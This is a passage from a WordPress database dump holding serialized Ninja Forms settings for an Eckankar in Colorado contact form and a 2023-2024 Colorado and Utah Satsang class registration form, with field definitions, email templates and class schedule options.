end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:243;}i:3;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-09-20 23:27:15\";s:5:\"label\";s:11:\"Admin Email\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:13:\"email_message\";s:3501:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new \"Eckankar in Colorado Contact\" form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br /><br />\r\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_303}</span><br /><br /><br />\r\n <br /><br /><br />\r\n<span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";}s:2:\"id\";i:244;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:42:\"TEST-RECAPTCHA V3 - PUBLIC FORM--TEST ONLY\";s:10:\"created_at\";s:19:\"2022-09-20 23:27:15\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:10:\"submit_278\";}s:20:\"repeatable_fieldsets\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:1:{i:249;i:249;}}',4,0x00),(61,'a:7:{s:2:\"id\";i:61;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:13:{i:0;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:1278:\"<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #eaf7ff; padding: 10px; border: 1px solid #d7d7d7; box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1632671894259\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:18:\"html_1632671894259\";}s:2:\"id\";i:657;}i:1;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:4:\"type\";s:2:\"hr\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:16:\"hr_1639606449220\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:16:\"hr_1639606449220\";}s:2:\"id\";i:646;}i:2;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:26:\"Satsang Class Registration\";s:9:\"field_key\";s:40:\"satsang_class_registration_1632437126898\";s:3:\"key\";s:40:\"satsang_class_registration_1632437126898\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:180:\"<p style=\"font-size:18px; font-weight: 600;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>\";s:14:\"drawerDisabled\";b:0;s:5:\"label\";s:26:\"Satsang Class Registration\";}s:2:\"id\";i:645;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:56:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name\";s:3:\"key\";s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:56:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name\";s:9:\"field_key\";s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:654;}i:4;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:55:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name\";s:3:\"key\";s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:55:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name\";s:9:\"field_key\";s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:652;}i:5;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:55:\"<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email\";s:3:\"key\";s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:55:\"<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email\";s:9:\"field_key\";s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:653;}i:6;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"value\";s:0:\"\";s:9:\"field_key\";s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";s:11:\"field_label\";s:52:\"<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone\";s:11:\"custom_mask\";s:0:\"\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:5:\"label\";s:52:\"<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone\";s:3:\"key\";s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";}s:2:\"id\";i:651;}i:7;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";b:0;s:5:\"label\";s:42:\"ECK Member Classes Available for 2023-2024\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:1336:\"<div style=\"font-size: 20px;color: #333333; background-color: #f3f2f2; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p><ul><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li></ul></div>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:56:\"eck_member_classes_available_for_2023-2024_1693928528054\";s:11:\"field_label\";s:42:\"ECK Member Classes Available for 2022-2023\";s:9:\"field_key\";s:56:\"eck_member_classes_available_for_2022-2023_1660414260469\";}s:2:\"id\";i:658;}i:8;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:31:\"Select One Class Per Registrant\";s:4:\"type\";s:9:\"listradio\";s:3:\"key\";s:45:\"select_one_class_per_registrant_1658696832524\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:16:{i:0;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:0;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:77:\"The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:76:\"The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:80:\"The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 7:00 pm - Zoom\";s:5:\"value\";s:79:\"The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:78:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:77:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:3;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:4;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:83:\"Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 6:45 pm - Zoom\";s:5:\"value\";s:82:\"Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:5;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:82:\"Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:81:\"Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 